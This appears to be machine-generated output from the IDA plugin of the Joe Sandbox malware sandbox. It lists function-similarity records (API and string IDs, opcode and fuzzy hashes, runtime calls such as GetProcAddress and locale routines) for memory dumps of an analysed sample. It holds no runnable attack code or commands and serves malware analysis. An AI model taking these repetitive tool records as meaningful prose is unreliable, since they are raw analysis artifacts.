                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                              • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                              • Opcode ID: 675fddd07030a209898f6e8aaf1c0342a05fe1b508bcf771858d80cbbb64ce1a
                                                                                                                                                                                                                                              • Instruction ID: 95cfd17ce84810cf8125ed2f46aba00e71eacd0c7115338ceed3e167d0c9d5f0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 675fddd07030a209898f6e8aaf1c0342a05fe1b508bcf771858d80cbbb64ce1a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BD0A731972310DB8340DF707D0D95A3AB4EB0E3833004011FC00D2190F7B445288A9C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 93dbfa12da62e60765a510b6d88024858f58765c5ea2624e50d3987c8276ce87
                                                                                                                                                                                                                                              • Instruction ID: eb2d29dc1cd2cb80ee4d629547f0a49aaff5bd7d7b4a4177999575b335622faa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93dbfa12da62e60765a510b6d88024858f58765c5ea2624e50d3987c8276ce87
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91B145B0A24345AFDB19DF98D885BAEBBF5FF05314F144159E800AB282D7B09E61CF64
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 0022589C
                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00225A5B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_task_strlen
                                                                                                                                                                                                                                              • String ID: ,$false$true
                                                                                                                                                                                                                                              • API String ID: 575380510-760133229
                                                                                                                                                                                                                                              • Opcode ID: c2c9e11da58d3365b48c9473d08f3df2eaeafe580c79a304ed0c64e5fdb8e3d0
                                                                                                                                                                                                                                              • Instruction ID: 67b658acc71b4a85aae56f8d020933a757bd890d7a35c446cffcfc82e970dc4c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2c9e11da58d3365b48c9473d08f3df2eaeafe580c79a304ed0c64e5fdb8e3d0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DC1A7B1514715AFD3109FA4DC85B6BB7E8EF94304F04892CF9858B242F775D928CB92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0023965B,0022EBD7,0022D9C8), ref: 00239672
                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00239680
                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00239699
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0023965B,0022EBD7,0022D9C8), ref: 002396EB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                              • Opcode ID: dceb5650875a441887e199728d33c3272ecc3bd3f965175c0dcacbf9c88c1d46
                                                                                                                                                                                                                                              • Instruction ID: 9a0479cf4c5f62f92e00046787275586a3c2dc301a64900aa588e2e6412fafc5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dceb5650875a441887e199728d33c3272ecc3bd3f965175c0dcacbf9c88c1d46
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A201F9B213A7226FA6152EB4BC4F95B275CEB027B6B204229F011550F1EFE18CB09944
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 0023A04B
                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 0023A2C4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                              • Opcode ID: b7e3fe12e4399db7d84a781b41ba336c02e8243daeeef7236eba1db9b10cc52f
                                                                                                                                                                                                                                              • Instruction ID: d0d65f99e3fefa3da1181a308976644bf067331bfb20f6936c404196e748fdf2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7e3fe12e4399db7d84a781b41ba336c02e8243daeeef7236eba1db9b10cc52f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43B1AFB182020AEFCF18DFA5D8819AEB7B5FF15300F104169E8956B212D772DA71CF92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00223BFC
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00223C1A
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00223C3C
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00223CAA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 593203224-3882152299
                                                                                                                                                                                                                                              • Opcode ID: 433e5bd9206be2e2b10a36e80cf6bebdd98765e8a1afc9d30278a27b4a74b3dd
                                                                                                                                                                                                                                              • Instruction ID: 0134cb67cb307559ac5be8478ef50d2fd136517f82f1861752df98cf6659dc1f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 433e5bd9206be2e2b10a36e80cf6bebdd98765e8a1afc9d30278a27b4a74b3dd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A21BF71918324AFC710EF94F849A2AB7A0FF48725F05455EE8885B3A1D734AE60CF82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0022A5AD
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022A5BA
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022A624
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022A63E
                                                                                                                                                                                                                                                • Part of subcall function 00229CA8: _Yarn.LIBCPMT ref: 00229CC8
                                                                                                                                                                                                                                                • Part of subcall function 00229CA8: _Yarn.LIBCPMT ref: 00229CEC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Yarn$H_prolog3Lockit::~_
                                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                                              • API String ID: 3084819986-1405518554
                                                                                                                                                                                                                                              • Opcode ID: 9516cc92970077acfa37d27b4936916a134d917c26c7667d78d0d51efe35a421
                                                                                                                                                                                                                                              • Instruction ID: 46bf87dcb83704056d16462f5728c5e456043b6190223753f2988ff032d05c4b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9516cc92970077acfa37d27b4936916a134d917c26c7667d78d0d51efe35a421
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF119371825754EFC720DFA9F481686BBE4FF28310F50496EE08A83641D770AA94CF9A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0024AD7A,000000FF,?,002341AA,00234091,?,00234246,00000000), ref: 0023411E
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,0024AD7A,000000FF,?,002341AA,00234091,?,00234246,00000000), ref: 00234130
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,0024AD7A,000000FF,?,002341AA,00234091,?,00234246,00000000), ref: 00234152
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: f5e0ba138416c4077aed1e46c365a655d2ddfdd23ba81a92f8bd2f28aa878953
                                                                                                                                                                                                                                              • Instruction ID: 94c8e16026386b0af18a687ec4842f07c54bb3f819f2711b7812489d1063711f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5e0ba138416c4077aed1e46c365a655d2ddfdd23ba81a92f8bd2f28aa878953
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33012B31A60719EFDB019F50DC0DFAEB7B8FB04B52F004125F811A26E0DB74A910CA84
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0023C10B
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0023C1D4
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0023C23B
                                                                                                                                                                                                                                                • Part of subcall function 0023A8D1: HeapAlloc.KERNEL32(00000000,0022A3DD,002234FA,?,0022ECE1,002234FC,002234FA,?,?,?,0022A03F,0022A3DD,002234FE,002234FA,002234FA,002234FA), ref: 0023A903
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0023C24E
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0023C25B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1096550386-0
                                                                                                                                                                                                                                              • Opcode ID: 72512c2d1252951d69994532cf075320b3ecae3d6c00e7d8f20f29e35e517a56
                                                                                                                                                                                                                                              • Instruction ID: 6afc38ec4f385b5b513006932c6fc6e834e9a16d5d2f527f7e78d48ef149e196
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72512c2d1252951d69994532cf075320b3ecae3d6c00e7d8f20f29e35e517a56
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2851B5F262024AAFDF119EA4DC42DBB76A9EF84710F250129FD08E6101EB70DD309BA0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00229ED5
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00229EE0
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00229F4E
                                                                                                                                                                                                                                                • Part of subcall function 00229DA2: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00229DBA
                                                                                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00229EFB
                                                                                                                                                                                                                                              • _Yarn.LIBCPMT ref: 00229F11
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1088826258-0
                                                                                                                                                                                                                                              • Opcode ID: 030009353e09b4a5398f347f646ff3671e75d97e8c9312a7752bf6188406d4e0
                                                                                                                                                                                                                                              • Instruction ID: cc8de1720c24839e8cc75d1491c86d65bd22d12fed68d572badc15032244bd34
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 030009353e09b4a5398f347f646ff3671e75d97e8c9312a7752bf6188406d4e0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1501BC35A25220ABC70AEFA0F95967C7BA1FF85351F144049E80197381CF34AEA2DF99
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strcspn
                                                                                                                                                                                                                                              • String ID: .$invalid string position
                                                                                                                                                                                                                                              • API String ID: 3709121408-2424062830
                                                                                                                                                                                                                                              • Opcode ID: c8095b165174ff14788751790909a1844f8f80e025134c09ad35761f1fd878ec
                                                                                                                                                                                                                                              • Instruction ID: d44f87b800ce0713383f16b957826ed319ed2be7d7bb7bd2bc5cafbc9173d1c0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8095b165174ff14788751790909a1844f8f80e025134c09ad35761f1fd878ec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6502E571628325AFC714DFA4D484A2AB7E5FFC5304F14865CF8958B361EB70E964CB82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                              • Opcode ID: 520dccfb0402a934fa68433598ee37e3d5418582e0342f685a9e3c55b5c4e8a5
                                                                                                                                                                                                                                              • Instruction ID: 7d24334a414cc8a245c886c22d8f254b25d952c36ca94aed5f9a23479a02db1e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 520dccfb0402a934fa68433598ee37e3d5418582e0342f685a9e3c55b5c4e8a5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28C1AE35220212EFC714DF28D490B6AB7E1FF88314F95866CE8598B3A1D736EC65CB81
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                              • Opcode ID: 761c4e366a8d500c9479c9cf5b65bb1a0b3f0e79d5f5d17d047485f6aea49992
                                                                                                                                                                                                                                              • Instruction ID: 82988ad68c79db18b242f50c53359a42bfeebd168a9b49aece4534a4da223995
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 761c4e366a8d500c9479c9cf5b65bb1a0b3f0e79d5f5d17d047485f6aea49992
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8791AD702102109FDB14CF69D494F2AB7E6FF89314F1886A8E9468F396D735EC66CB41
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(00000000,?,0023CF02), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000,?,?,00000028,00236E76), ref: 0023ABC9
                                                                                                                                                                                                                                              • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002346FA,?,?,?,00000055,?,-00000050,?,?,?), ref: 0023F395
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002346FA,?,?,?,00000055,?,-00000050,?,?), ref: 0023F3CC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                              • String ID: l#%$utf8
                                                                                                                                                                                                                                              • API String ID: 943130320-1806676032
                                                                                                                                                                                                                                              • Opcode ID: 6b7e6a31e2baa725a7a9702ee2d5833ce649c89f4f9bd3fccba13432c89c36cd
                                                                                                                                                                                                                                              • Instruction ID: 3e5512d1bb866e2e110405c5fb2cb89ed46810312e4e7367fb02af14371e86c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b7e6a31e2baa725a7a9702ee2d5833ce649c89f4f9bd3fccba13432c89c36cd
